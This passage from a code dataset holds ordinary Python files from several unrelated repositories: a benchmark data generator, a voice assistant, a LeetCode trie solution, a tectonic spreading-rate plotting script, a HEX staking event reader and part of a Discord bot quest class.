multiprocessing.Pool(multiprocessing.cpu_count()) as pool:\n path = os.path.join(path_to_dir, table_name + '.csv')\n columns = pool.starmap(gen_column, zip(attributes, [NUM_TUPLES] * len(attributes)))\n\n with open(path, 'w') as csv:\n # write header\n csv.write(','.join(map(lambda attr: attr[0], attributes)) + '\\n')\n rows = map(','.join, zip(*columns))\n for g in grouper(rows, 1000):\n csv.write('\\n'.join(g))\n csv.write('\\n')\n\ndef gen_tables(schema, path_to_dir):\n for table_name, attributes in schema.items():\n gen_table(table_name, attributes, path_to_dir)\n\nif __name__ == '__main__':\n print(f'Generating data in {OUTPUT_DIR}')\n os.makedirs(OUTPUT_DIR, exist_ok=True)\n gen_database('operators', SCHEMA, OUTPUT_DIR)\n gen_tables(SCHEMA, OUTPUT_DIR)\n","repo_name":"mutable-org/mutable","sub_path":"benchmark/operators/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"94"} +{"seq_id":"23517655705","text":"import datetime\nimport pyttsx3\nimport file_open\nimport cloak\nimport web\nimport random\nimport os\nfrom engine2 import speak\nimport speech_recognition as sr\nfrom user_cred1 import SignUp\n\n\ndef Greetings():\n\n time = int(datetime.datetime.now().hour)\n if time >= 12 and time < 16:\n speak(\"Good Afternoon Sir\")\n elif time >= 0 and 
time < 12:\n speak(\"Good Morning Sir\")\n else:\n speak(\"Good Evening Sir\")\n\n speak(\"I am Avatar, always at your service.\")\n\n\ndef takecommand():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Lisening...\")\n r.pause_threshold = 1\n audio = r.listen(source)\n\n try:\n print(\"Recognizing...\")\n query = r.recognize_google(audio, language='en-in')\n print(f\"Boss: {query}\\n\")\n\n except Exception as e:\n print(\"Say that again please...\")\n return \"None\"\n return query\n\n\ndef main():\n search_q = ['who is', 'what is', 'tell me about', 'show me about']\n bye_q = ['goodbye', 'turn off', 'shutdown', 'packup', 'bye', 'close']\n while True:\n query = input(\"Enter Command:- \").lower()\n # query = takecommand().lower()\n if \"google\" in query:\n web.start(query)\n\n elif \"time\" in query:\n speak(cloak.time())\n\n elif \"date\" in query:\n speak(cloak.date())\n elif 'search' in query:\n web.search(query)\n\n elif \"youtube\" in query:\n web.start(query)\n\n elif 'open' in query:\n\n file_open.File(query)\n\n elif 'how are you' in query:\n speak(\"Fine\")\n\n elif 'note' in query:\n qry = \" \"+' ' + '\\n' + f'{cloak.date()} ' + \\\n f'{cloak.time()}' + '\\n' + query[5:] + '\\n'\n with open(\"note.txt\", 'a') as file:\n file.writelines(qry)\n speak(\"Ok Boss\")\n\n elif 'nickname' in query:\n with open('nickname.txt', mode='r') as nick_file:\n name = nick_file.read()\n speak(f\"My nickname is {name}\")\n\n elif query in bye_q:\n speak(\"Good bye sir, see you soon\")\n quit()\n else:\n for item in search_q:\n if item in query:\n speak(\"Searching...\")\n web.search(query)\n\n for item in ['hi', 'hello']:\n if item in query:\n speak(\"Hello sir, How can I help you\")\n\n\na = SignUp()\n\nif a == True:\n\n Greetings()\n main()\n\n\nelif a == False:\n speak(\"Unauthenticated User\")\nelif a == \"Exit\":\n exit()\n","repo_name":"Dheeraj4103/Avatar2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"72462107188","text":"class Trie:\n def __init__(self):\n self.children: List[Trie | None] = [None] * 26\n self.ref: int = -1\n\n def insert(self, w: str, i: int):\n node = self\n for c in w:\n idx = ord(c) - ord(\"a\")\n if node.children[idx] is None:\n node.children[idx] = Trie()\n node = node.children[idx]\n node.ref = i\n\n def search(self, w: str) -> int:\n node = self\n for c in w:\n idx = ord(c) - ord(\"a\")\n if node.children[idx] is None:\n return -1\n node = node.children[idx]\n if node.ref != -1:\n return node.ref\n return -1\n\n\nclass Solution:\n def replaceWords(self, dictionary: List[str], sentence: str) -> str:\n trie = Trie()\n for i, w in enumerate(dictionary):\n trie.insert(w, i)\n ans = []\n for w in sentence.split():\n idx = trie.search(w)\n ans.append(dictionary[idx] if idx != -1 else w)\n return \" \".join(ans)\n","repo_name":"doocs/leetcode","sub_path":"solution/0600-0699/0648.Replace Words/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":25791,"dataset":"github-code","pt":"94"} +{"seq_id":"27697286303","text":"import os,sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.patheffects as PathEffects\nimport pyrot.reconstruction as pyrec\nfrom pyrot.rot import cart2latlon,cart2latlonrot,latlon2cart\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom geographiclib.geodesic import 
Geodesic\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter, AutoMinorLocator)\n\n\nmpl.rcParams.update(mpl.rcParamsDefault)\n#mpl.use(\"\")\nmpl.rcParams['svg.fonttype'] = 'none'\nmpl.rcParams['pdf.fonttype'] = 42\nmpl.rcParams['ps.fonttype'] = 42\n\ngeoid = Geodesic(6371.,0.)\n#xlims = [-20,20]\n#ylims = [-50,70]\nxlims = [-20,20]\nylims = [-90,60]\ntick_step = 10.\nfontsize = 18\n#rec_path = \"/home/kevin/Projects/DispursionOfHSAges/data/reconstructions/AGHJ06.csv\"\n#rec_path = \"/home/kevin/Projects/DispursionOfHSAges/data/reconstructions/PA_nhotspot_inversion.csv\"\ntimescale_file = \"/home/kevin/Projects/PySkew/raw_data/timescale_gradstein2012_all.txt\"\ntdf = pd.read_csv(timescale_file,sep=\"\\t\")\nprojection_age = 11.0\n#recs = [[[-14.37,51.27],\"India-Somalia\",\"tab:green\",\"./data/reconstructions/relrec/INSO_EH_rec.csv\"],[[-52.42,48.00],\"India-East Antarctica\",\"tab:pink\",\"./data/reconstructions/relrec/INAN_rec.csv\"],[[-60.68,12.17],\"Somalia-East Antarctica\",\"tab:purple\",\"./data/reconstructions/relrec/ANSO_rec.csv\"],[[-63.00,120.87],\"Australia-East Antarctica\",\"tab:orange\",\"./data/reconstructions/relrec/ANAU_rec.csv\"], [[-65.27,-19.96],\"South America-East Antarctica\",\"tab:cyan\",\"./data/reconstructions/relrec/SAAN_rec.csv\"]]#,[[],\"Antarctica-Nubia\",\"black\",\"./data/reconstructions/relrec/ANNB_rec.csv\"]]\n#recs = [[[-14.37,51.27],\"India-Somalia | Cande et al. 2010\",\"#97FA97\",\"./data/reconstructions/relrec/INSO_rec.csv\"],[[-14.37,51.27],\"India-Somalia | Copley et al. 2010\",\"tab:green\",\"./data/reconstructions/relrec/INSO_CPJV_rec.csv\"],[[-14.37,51.27],\"India-Somalia | Eagles and Hoang 2013\",\"#004400\",\"./data/reconstructions/relrec/INSO_EH_rec.csv\"]]\nrecs = [[[42.09,177.77],\"Vancouver-Pacific\",\"tab:red\",\"./data/reconstructions/relrec/PAVA_EByte_recs.csv\"],[[3.18, -153.67],\"Farallon-Pacific\",\"tab:blue\",\"./data/reconstructions/relrec/PAFR_EByte_recs.csv\"],[[-69.82,-101.487],\"West Antarctica-Pacific\",\"white\",\"./data/reconstructions/relrec/PAWAN_EByte_recs.csv\"]]\n#recs = [[[22.72,-156.63],\"Farallon-Pacific Molokai FZ\",\"#021828\",\"./data/reconstructions/relrec/PAFR_EByte_recs.csv\"],[[3.18, -153.67],\"Farallon-Pacific Clipperton FZ\",\"tab:blue\",\"./data/reconstructions/relrec/PAFR_EByte_recs.csv\"],[[-24.40,-151.14],\"Farallon-Pacific Austral FZ\",\"#9ACFF5\",\"./data/reconstructions/relrec/PAFR_EByte_recs.csv\"]]\n#[\"Pacific-Kula\",\"tab:cyan\",\"./data/reconstructions/relrec/PAKU_EByte_recs_cut.csv\"] #OLD PACIFIC KULA LINE\n#recs = [[[19+25/60,-(155+17/60)],\"Pacific-Hotspots\",\"tab:blue\",\"./data/reconstructions/PA_nhotspot_inversion.csv\"]]\n\n#ref_points_latlon = [[-0.134,-128.765],[15.16295753539516,-38.80131405142588],[-74.83642179968396,-38.27054899816777]] #Pacific Data (Azi = 74.837)\n#v = np.array([[-0.62612591, 0.75219207, 0.20536172],\n# [-0.77971846, -0.60480635, -0.16201359],\n# [-0.00233874, 0.26156523, -0.96518297]]) #Galapagos FZ Location\n#v = np.array([[-0.62612591, 0.660197 , -0.18767058],\n# [-0.77971846, -0.73054364, -0.38538909],\n# [-0.00233874, 0.17448758, -0.90346832]]) #Molokai FZ Location\n\nv = np.eye(3) #Null Rotation\ne = np.ones((3,))\n\n#pahs_rec = pyrec.PlateReconstruction.read_csv(recs[0][-1])\n#e,v = np.linalg.eig(pahs_rec[projection_age].to_cart_cov())\n#print(pahs_rec[projection_age].to_cart_cov())\n#idx = e.argsort()[::-1]\n#e = e[idx]\n#v = v[:,idx]\n\n# for j,vec in enumerate(v.T):\n# pole,_ = cart2latlon(*vec,np.zeros([3,3]))\n# if j==1 and \"AGHJ06\" 
in rec_path:\n# pole = [-pole[0],pole[1]-180]\n# cart,_ = latlon2cart(*pole,np.zeros([3,3]))\n# v[:,j] = cart\n# if j<2 and \"PA_nhotspot_inversion\" in rec_path:\n# pole = [-pole[0],pole[1]-180]\n# cart,_ = latlon2cart(*pole,np.zeros([3,3]))\n# v[:,j] = cart\n# print(pole)\n #import pdb; pdb.set_trace()\nprint(np.rad2deg(np.sqrt(e)))\nprint(v)\n\nfig = plt.figure(figsize=(16,9))\nax = fig.add_subplot(1, 1, 1)\nplt.tick_params(labelsize=fontsize)\n\n#import pdb; pdb.set_trace()\n\nfor ref_point,label,color,rec_path in recs:\n\n print(\"-----------------------------------------------------------------------\")\n print(rec_path)\n\n try:\n pahs_rec = pyrec.PlateReconstruction.read_csv(rec_path)\n except ValueError:\n pahs_rec = pyrec.PlateReconstruction.read_csv(rec_path,sep=\",\")\n\n ################################Eigen Correct output for AGHJ06\n #for pole in [[17.03,218.14],[-51.66,285.35],[-33.15,139.68]]:\n # cart,_ = latlon2cart(*pole,np.zeros([2,2]))\n # if pole[0]==17.03: v = cart\n # else: v = np.vstack([v,cart])\n #v = v.T\n #print(v)\n\n ################################Eigen Correct output for GWG20\n #for pole in [[19.44,-149.96],[-50.20,145.10],[33.15,-253.29]]:\n # cart,_ = latlon2cart(*pole,np.zeros([2,2]))\n # if pole[0]==19.44: v = cart\n # else: v = np.vstack([v,cart])\n #v = v.T\n #print(v)\n\n comps = np.array([])\n for i,rot in enumerate(pahs_rec.get_rrots()):\n# if int(rot.age_f%5): continue\n# if rot.age_f<30. or rot.age_f>55.: continue\n rv = np.rad2deg(v @ rot.to_cart())\n print(rot)\n print(rv)\n print(np.sqrt(rv[0]**2 + rv[1]**2 + rv[2]**2))\n# print(rot.age_f,np.rad2deg(rv))\n comp = rv\n# comp[1] = rot.age_f\n try:\n idx = tdf[tdf[\"base\"]==rot.age_f][\"chron\"].index\n name = tdf.loc[idx][\"chron\"].iloc[0]\n if \"r\" in name: name = tdf.loc[idx+1][\"chron\"].iloc[0].lstrip(\"C\").rstrip(\"n\")+\"y\"\n else: name = name.lstrip(\"C\").rstrip(\"n\")+\"o\"\n# txt = ax.text(comp[1], comp[0], \"%s\"%name, color=color, ha=\"right\", va=\"bottom\", fontsize=fontsize-6)\n# # txt = ax.text(comp[1], comp[0], r\"%.1f Ma\"%rot.age_f, color=color, ha=\"left\", va=\"bottom\", fontsize=fontsize-6)\n# txt.set_path_effects([PathEffects.withStroke(linewidth=3, foreground=\"k\", alpha=.7)])\n\n txt = ax.text(comp[1]+.3, comp[2], \"%s\"%name, color=color, ha=\"left\", va=\"center\", fontsize=fontsize-6)\n # txt = ax.text(comp[1], comp[2], r\"%.1f Ma\"%rot.age_f, color=color, ha=\"left\", va=\"bottom\", fontsize=fontsize-6)\n txt.set_path_effects([PathEffects.withStroke(linewidth=3, foreground=\"k\", alpha=.7)])\n except IndexError: pass\n if len(comps)==0: comps = comp\n else: comps = np.vstack([comps,comp])\n# if rot.age_f==47.349:\n# ax.plot(comps[-1,1], comps[-1,0], color=\"k\", marker=\"o\", linestyle=\"-\",zorder=100,mec=\"k\")\n# ax.plot(comps[-1,1], comps[-1,2], color=\"k\", marker=\"s\", linestyle=\"-\",zorder=100,mec=\"k\")\n\n# comps = comps/np.max(np.abs(comps),axis=0)\n# if \"EByte\" in rec_path: comps = comps[1:]\n print(comps)\n\n ##########################################################Plotting\n\n # Actual plotting\n ax.plot(comps[:,1], comps[:,0], color=color, marker=\"o\", linestyle=\"-\",zorder=2,label=label+\" X-Y\",mec=\"k\")\n ax.plot(comps[:,1], comps[:,0], color=\"k\", marker=None, linestyle=\"-\",zorder=1,linewidth=3)\n ax.plot(comps[:,1], comps[:,2], color=color, marker=\"s\", linestyle=\"-\",zorder=3,label=label+\" Z-Y\",mec=\"k\")\n ax.plot(comps[:,1], comps[:,2], color=\"k\", marker=None, 
linestyle=\"-\",zorder=1,linewidth=3)\n\n#ax.axvspan(47.4-1.,47.4+1.,color=\"tab:red\",alpha=.3,zorder=0)\n#ax.axvline(47.4,color=\"tab:red\",zorder=1)\n\nax.legend(facecolor=\"grey\",framealpha=.3,fontsize=14)\n\n# Move left y-axis and bottim x-axis to centre, passing through (0,0)\nax.spines['left'].set_position([\"data\",0.])\nax.spines['bottom'].set_position([\"data\",0.])\n\n# Eliminate upper and right axes\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\n# Show ticks in the left and lower axes only\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\n\nax.set_xticks(list(np.arange(xlims[0],0,tick_step))+list(np.arange(tick_step,xlims[1]+tick_step,tick_step)))\nax.set_yticks(list(np.arange(ylims[0],0,tick_step))+list(np.arange(tick_step,ylims[1]+tick_step,tick_step)))\n#ax.set_xlim(xlims)\n#ax.set_ylim(ylims)\n\nxlabel = ax.set_xlabel(r\"Y\",fontsize=fontsize)\n#ylabel = ax.set_ylabel(r\"$\\hat{w}_{max},\\hat{w}_{min}$\",rotation=0.,fontsize=fontsize)\nticklab = ax.yaxis.get_ticklabels()[0]\ntrans = ticklab.get_transform()\nax.yaxis.set_label_coords(0., ylims[1] + 1., transform=trans)\nax.text(0.1, ylims[1] + 4.5, r\"Z\", color=\"black\", transform=trans, ha=\"left\", fontsize=fontsize)\nax.text(0., ylims[1] + 4.5, r\",\", color=\"black\", transform=trans, ha=\"center\", fontsize=fontsize)\nax.text(-0.1, ylims[1] + 4.5, r\"X\", color=\"black\", transform=trans, ha=\"right\", fontsize=fontsize)\n\nticklab = ax.xaxis.get_ticklabels()[0]\ntrans = ticklab.get_transform()\nax.xaxis.set_label_coords(xlims[1] + 2., 1., transform=trans)\n#ax.set_title(\"Pacific Basin Finite Rotation Vector Endpoints\",fontsize=fontsize+4)\n\n #ticklab = ax.yaxis.get_ticklabels()[0]\n #trans = ticklab.get_transform()\n #ax.yaxis.set_label_coords(0., ylims[1] + 1., transform=trans)\n\nfig.savefig(\"./results/vector_endpoint_%.1f.png\"%projection_age,transparent=True)\nfig.savefig(\"./results/vector_endpoint_%.1f.pdf\"%projection_age,transparent=True)\nfig.savefig(\"./results/vector_endpoint_%.1f.svg\"%projection_age,transparent=True)\n\n\n\n####################################################################RATES\n\nfig = plt.figure(figsize=(16,9))\nax = fig.add_subplot(1, 1, 1)\nplt.tick_params(which=\"major\",labelsize=fontsize, length=8)\n\nfor ref_point,label,color,rec_path in recs:\n\n try:\n pahs_rec = pyrec.PlateReconstruction.read_csv(rec_path)\n except ValueError:\n pahs_rec = pyrec.PlateReconstruction.read_csv(rec_path,sep=\",\")\n\n rot_rate,age = [],[]\n for i,rot in enumerate(pahs_rec.get_srots()):\n geodict = geoid.Inverse(*ref_point,rot.lat,rot.lon)\n rad_dis = np.deg2rad(geodict[\"a12\"])\n if \"PAVA\" in rec_path and rot.age_i==52.62: rot_rate += [np.nan,np.nan]#rot_rate += [abs(83.7895*np.sin(rad_dis)),abs(83.7895*np.sin(rad_dis))]\n# elif \"rec\" in os.path.basename(rec_path): rot_rate += [abs(111.113*rot.wr*np.sin(rad_dis)),abs(111.113*rot.wr*np.sin(rad_dis))]\n# else: rot_rate += [abs(2*111.113*rot.wr*np.sin(rad_dis)),abs(2*111.113*rot.wr*np.sin(rad_dis))]\n else: rot_rate += [abs(111.113*rot.wr*np.sin(rad_dis)),abs(111.113*rot.wr*np.sin(rad_dis))]\n age += [rot.age_i,rot.age_f]\n# if geodict[\"azi1\"]+90>180 or geodict[\"azi1\"]+90<0: geodict[\"azi1\"] = (180+geodict[\"azi1\"])%360\n# new_ref_geo = geoid.ArcDirect(*ref_point, geodict[\"azi1\"]+90, abs(rot.wr*np.sin(rad_dis)))\n# ref_point = [new_ref_geo[\"lat2\"],new_ref_geo[\"lon2\"]]\n\n print(rot.age_i,rot.age_f,111.113*rot.wr,rot_rate[-1],geodict[\"azi1\"]+90,ref_point)\n\n 
nlat,nlon,_,_ = rot.rotate(*ref_point)\n ref_point = (nlat,nlon)\n\n print(\"NEW REF:\", ref_point)\n\n if age[0]==0.: age,rot_rate = age[2:],rot_rate[2:]\n if rot_rate[0]==0.: age,rot_rate = age[1:],rot_rate[1:]\n\n print(np.array([age,rot_rate]).T)\n\n ax.plot(age,rot_rate,color=color,label=label,zorder=3)\n ax.plot(age,rot_rate,color=\"k\",linewidth=3,zorder=2)\n\nylim = ax.get_ylim()\nax.axvspan(47.4-1.,47.4+1.,10/(ylim[1]+10),1.,color=\"tab:red\",alpha=.3,zorder=1,label=\"Coeval Bend Age\")\nax.axvline(47.4,10/(ylim[1]+10),1.,color=\"tab:red\",zorder=5,linewidth=2)\n\nfor i,row in tdf.iterrows():\n name = row[\"chron\"]\n# if \"r\" in name: name = tdf.loc[idx+1][\"chron\"].iloc[0].lstrip(\"C\").rstrip(\"n\")+\"y\"\n# else: name = name.lstrip(\"C\").rstrip(\"n\")+\"o\"\n# if row[\"top\"]<10 or row[\"top\"]>84: continue\n if \"n\" in row[\"chron\"]: color,oth_color=\"k\",\"w\"\n else: color,oth_color=\"w\",\"k\"\n ax.bar(row[\"top\"],-10.,row[\"base\"]-row[\"top\"],align=\"edge\",color=color,zorder=0)\n\n if name in [\"C33r\",\"C33n\",\"C32n.2n\",\"C31r\",\"C30n\",\"C26r\",\"C24r\",\"C21n\",\"C20r\",\"C12r\"]:\n txt = ax.text((row[\"base\"]+row[\"top\"])/2, -5, \"%s\"%(name).strip(\"C\").split(\".\")[0], color=oth_color, ha=\"center\", va=\"center\", fontsize=fontsize-7)\n# txt.set_path_effects([PathEffects.withStroke(linewidth=3, foreground=\"k\", alpha=.7)])\n\nax.plot([11.056,83.64],[0.,0.],color=\"k\")\n\nax.set_xlim(83.64,11.056)\nax.set_ylim(-10,ylim[1])\nax.set_xlabel(\"Age (Ma)\",fontsize=fontsize)\nax.set_ylabel(\"Spreading Rate (mm/a)\",fontsize=fontsize)\nax.yaxis.set_minor_locator(MultipleLocator(5))\nax.xaxis.set_minor_locator(MultipleLocator(1))\nax.xaxis.set_major_locator(MultipleLocator(5))\nax.tick_params(which='minor', color='k', length=4)\n\nax.legend(facecolor=\"grey\",framealpha=.3,fontsize=14)\nax.set_title(\"Pacific Ocean Basin Spreading Rates\",fontsize=fontsize+4)\n\nfig.savefig(\"./results/vector_rates_%.1f.png\"%projection_age,transparent=True)\nfig.savefig(\"./results/vector_rates_%.1f.pdf\"%projection_age,transparent=True)\n\nplt.show()\n","repo_name":"Rice-Tectonics-Group/Quantification-of-PacificPlate-Hotspot-Tracks","sub_path":"src/vector_endpoint_plot_all_recs.py","file_name":"vector_endpoint_plot_all_recs.py","file_ext":"py","file_size_in_byte":13036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71644582070","text":"import time\nimport json\nfrom web3.auto.infura import w3\nfrom typing import List\n\nHEX_CONTRACT_ADDRESS = '0x2b591e99afE9f32eAA6214f7B7629768c40Eeb39'\nwith open('HEX/abi.json') as json_data:\n ABI = json.load(json_data)\n\nDAYS_TO_SECONDS=24*60*60\nSECONDS_TO_DAYS=1/DAYS_TO_SECONDS\n\nHEX_LAUNCH_TIME=1575331200\nHEX_TO_HEARTS = 1e8\nTSHARES_TO_SHARES = 1e12\n\n\nclass HEX_Stake:\n def __init__(self, stakeId):\n self.stakeId = stakeId\n self.timestampStart = None # stakeStart\n self.timestampUnlock = None # good accounting - None if stake not yet unlocked\n self.timestampEnd = None # stakeEnd - None if stake not yet ended\n self.stakedHearts = None # common\n self.stakeShares = None # common\n self.lockedDay = None # good accounting or stakeEnd\n self.stakedDays = None # stakeStart\n self.isAutoStake = None # stakeStart\n self.payout = None # good accounting or stakeEnd\n self.penalty = None # good accounting or stakeEnd\n\n self.unlockedDay = None # locally caluclated\n self.income = None # locally caluclated (payout - penalty)\n\n @staticmethod\n def 
hearts_to_hex(hearts):\n return hearts / HEX_TO_HEARTS\n\n @staticmethod\n def shares_to_tshares(shares):\n return shares / TSHARES_TO_SHARES\n\n def __str__(self):\n return \"Stake ID: \" + str(self.stakeId) + \"\\n\" + \\\n \"Stake submitted: \" + (time.strftime(\"%Y-%m-%d %H:%M:%S %Z %z\", time.localtime(self.timestampStart)) if self.timestampStart else \"0-0-0 0:0:0\") + \"\\n\" + \\\n \"Staked Hex: \" + str(self.hearts_to_hex(self.stakedHearts)) + \"\\n\" + \\\n (\"Interests HEX: \" + str(self.hearts_to_hex(self.payout)) + \"\\n\" if self.payout else \"\" ) + \\\n (\"Penalty HEX: \" + str(self.penalty/1e8) + \"\\n\" if self.penalty else \"\" ) + \\\n (\"Income HEX: \" + str(self.hearts_to_hex(self.income)) + \"\\n\" if self.income else \"\" ) + \\\n \"Staked TShares: \" + str(self.shares_to_tshares(self.stakeShares)) + \"\\n\" + \\\n \"Staked Days: \" + str(self.stakedDays) + \"\\n\" + \\\n \"Locked Day: \" + str(self.lockedDay) + \"\\n\" + \\\n \"Unlocked Day: \" + str(self.unlockedDay) + \"\\n\" + \\\n \"Is Auto Stake: \" + str(self.isAutoStake) + \"\\n\" \\\n \"Stake withdrew: \" + (time.strftime(\"%Y-%m-%d %H:%M:%S %Z %z\", time.localtime(self.timestampEnd)) if self.timestampEnd else \"0-0-0 0:0:0\") + \"\\n\"\n\n \n def processStakeStartData(self, stakeData0):\n \"\"\"\n Process byte data returned by StakeStart event\n \"\"\"\n # https://etherscan.io/address/0x2b591e99afe9f32eaa6214f7b7629768c40eeb39#code#L606\n # StakeStart (auto-generated event):\n # uint40 timestamp --> data0 [ 39: 0]\n # address indexed stakerAddr\n # uint40 indexed stakeId\n # uint72 stakedHearts --> data0 [111: 40]\n # uint72 stakeShares --> data0 [183:112]\n # uint16 stakedDays --> data0 [199:184]\n # bool isAutoStake --> data0 [207:200]\n\n self.timestampStart = stakeData0 & (2**40-1)\n self.stakedHearts = (stakeData0 >> 40) & (2**72-1)\n self.stakeShares = (stakeData0 >> 112) & (2**72-1)\n self.stakedDays = (stakeData0 >> 184) & (2**16-1)\n self.isAutoStake = (stakeData0 >> 200) & (2**1-1)\n self.lockedDay = round((self.timestampStart - HEX_LAUNCH_TIME) * SECONDS_TO_DAYS + .5)+1 #since HEX launch, day 0 is day 1, stake is assumed to start at the end of day\n\n def processStakeGoodAccountData(self, stakeData0, stakeData1):\n \"\"\"\n Process byte data returned by Good Accounting event\n \"\"\"\n # https://etherscan.io/address/0x2b591e99afe9f32eaa6214f7b7629768c40eeb39#code#L587\n # StakeGoodAccounting(auto-generated event)\n # uint40 timestamp --> data0 [ 39: 0]\n # address indexed stakerAddr\n # uint40 indexed stakeId\n # uint72 stakedHearts --> data0 [111: 40]\n # uint72 stakeShares --> data0 [183:112]\n # uint72 payout --> data0 [255:184]\n # uint72 penalty --> data1 [ 71: 0]\n # address indexed senderAddr\n \n self.timestampUnlock = stakeData0 & (2**40-1)\n self.stakedHearts = (stakeData0 >> 40) & (2**72-1)\n self.stakeShares = (stakeData0 >> 112) & (2**72-1)\n self.payout = (stakeData0 >> 184) & (2**72-1)\n self.penalty = stakeData1 & (2**72-1)\n\n self.unlockedDay = round((self.timestampUnlock - HEX_LAUNCH_TIME) * SECONDS_TO_DAYS + .5)+1 #since HEX launch, day 0 is day 1, stake is assumed to start at the end of day\n\n def processStakeEndData(self, stakeData0, stakeData1):\n \"\"\"\n Process byte data returned by StakeEnd event\n \"\"\"\n # https://etherscan.io/address/0x2b591e99afe9f32eaa6214f7b7629768c40eeb39#code#L571\n # StakeEnd (auto-generated event)\n # uint40 timestamp --> data0 [ 39: 0]\n # address indexed stakerAddr\n # uint40 indexed stakeId\n # uint72 stakedHearts --> data0 [111: 40]\n # 
uint72 stakeShares --> data0 [183:112]\n # uint72 payout --> data0 [255:184]\n # uint72 penalty --> data1 [ 71: 0]\n # uint16 servedDays --> data1 [ 87: 72]\n # bool prevUnlocked --> data1 [ 95: 88]\n\n self.timestampEnd = stakeData0 & (2**40-1)\n self.stakedHearts = (stakeData0 >> 40) & (2**72-1)\n self.stakeShares = (stakeData0 >> 112) & (2**72-1)\n self.payout = (stakeData0 >> 184) & (2**72-1)\n self.penalty = stakeData1 & (2**72-1)\n self.servedDays = (stakeData1 >> 72) & (2**16-1)\n self.prevUnlocked = (stakeData1 >> 88) & (2**1-1)\n\n if self.prevUnlocked:\n self.unlockedDay = round((self.timestampEnd - HEX_LAUNCH_TIME) * SECONDS_TO_DAYS + .5)+1 #since HEX launch, day 0 is day 1, stake is assumed to start at the end of day\n else:\n self.timestampUnlock = self.timestampEnd #populate timestampUnlock with timestampEnd since unlocking is happening at the same time as the stake ends\n \n self.income = self.payout - self.penalty #for tax purposes, income is registered at the stakeEnd only\n\nclass HEX_Contract:\n def __init__(self):\n self.hex_ = w3.eth.contract(HEX_CONTRACT_ADDRESS, abi=ABI)\n print(\"ERC20 contract found:\" + self.hex_.functions.name().call() + \" (\" + self.hex_.address + \")\")\n\n def read_stake_count(self, walletAddress):\n \"\"\"\n Read the stake count of an address from the contract function\n \"\"\"\n return self.hex_.functions.stakeCount(walletAddress).call()\n\n def read_stake_by_index(self, walletAddress, index): \n \"\"\"\n Read the (limited) stake data for wallet address from the contract function\n #index is 0 to stake_count-1\n \"\"\"\n stakeId, stakedHearts, stakeShares, lockedDay, stakedDays, unlockedDay, isAutoStake \\\n = self.hex_.functions.stakeLists(walletAddress, index).call()\n staked_HEX = HEX_Stake.hearts_to_hex(stakedHearts)\n stakedTShares = HEX_Stake.shares_to_tshares(stakeShares)\n lockedDate = time.localtime(HEX_LAUNCH_TIME + stakedDays*DAYS_TO_SECONDS)\n \n stake = HEX_Stake(stakeId)\n stake.stakedHearts = staked_HEX\n stake.stakeShares = stakedTShares\n stake.lockedDay = lockedDay\n stake.stakedDays = stakedDays\n stake.unlockedDay = unlockedDay\n stake.isAutoStake = isAutoStake\n return stake\n\n def find_all_address_stakes(self, address):\n \"\"\"\n Find the (verbose) data for all stakes of an address\n \"\"\"\n stakeStartedEventsForAddress=self.hex_.events.StakeStart.createFilter(fromBlock=0, argument_filters={'stakerAddr': address}).get_all_entries()\n \n all_stakes = [] # type: List[HEX_Stake]\n for event in stakeStartedEventsForAddress:\n stakeId = event['args']['stakeId']\n stakeData0 = event['args']['data0']\n stake = HEX_Stake(stakeId)\n stake.processStakeStartData(stakeData0)\n\n stakeGoodAccountEventsForAddress=self.hex_.events.StakeEnd.createFilter(fromBlock=0, argument_filters={'stakerAddr': address}).get_all_entries()\n for event in stakeGoodAccountEventsForAddress:\n if event['args']['stakeId'] == stakeId:\n stakeData0 = event['args']['data0']\n stakeData1 = event['args']['data1']\n stake.processStakeGoodAccountData(stakeData0, stakeData1)\n break\n\n stakeEndedEventsForAddress=self.hex_.events.StakeEnd.createFilter(fromBlock=0, argument_filters={'stakerAddr': address}).get_all_entries()\n for event in stakeEndedEventsForAddress:\n if event['args']['stakeId'] == stakeId:\n stakeData0 = event['args']['data0']\n stakeData1 = event['args']['data1']\n stake.processStakeEndData(stakeData0, stakeData1)\n break\n\n all_stakes.append(stake)\n return 
all_stakes\n","repo_name":"dzid26/HEX_stake_importer","sub_path":"HEX/hex_api.py","file_name":"hex_api.py","file_ext":"py","file_size_in_byte":9495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31385954123","text":"import json\nimport random\nfrom collections import defaultdict, namedtuple\nfrom typing import Dict, List\nimport math\nimport asyncio\n\nimport discord\nimport jsonpickle\n\nfrom ..util import SlotPickleMixin\nfrom .. import dbconn\nfrom .. import util\nfrom ..game import players\nfrom ..game import weapons\nfrom ..game.helpers.misc import DueUtilObject, DueMap\nfrom .players import Player\nfrom . import gamerules\n\nquest_map = DueMap()\n\nMIN_QUEST_IV = 0\nQUEST_DAY = 86400\nQUEST_COOLDOWN = 360\nMAX_DAILY_QUESTS = 50\nMAX_ACTIVE_QUESTS = 10\n\n\nclass Quest(DueUtilObject, SlotPickleMixin):\n \"\"\"A class to hold info about a server quest\"\"\"\n\n __slots__ = [\"server_id\", \"created_by\",\n \"task\", \"w_id\", \"spawn_chance\", \"image_url\",\n \"base_attack\", \"base_strg\", \"base_accy\", \"base_hp\",\n \"channel\", \"times_beaten\"]\n\n DEFAULT_IMAGE = \"http://i.imgur.com/zOIJM9T.png\"\n\n _BaseStats = namedtuple(\"BaseStats\", [\"attack\", \"strg\", \"accy\", \"hp\"])\n\n def __init__(self, name, base_attack, base_strg, base_accy, base_hp, **extras):\n message = extras.get('ctx', None)\n given_spawn_chance = extras.get('spawn_chance', 4)\n\n if message is not None:\n if message.server in quest_map:\n if name.lower() in quest_map[message.server]:\n raise util.DueUtilException(message.channel, \"A foe with that name already exists 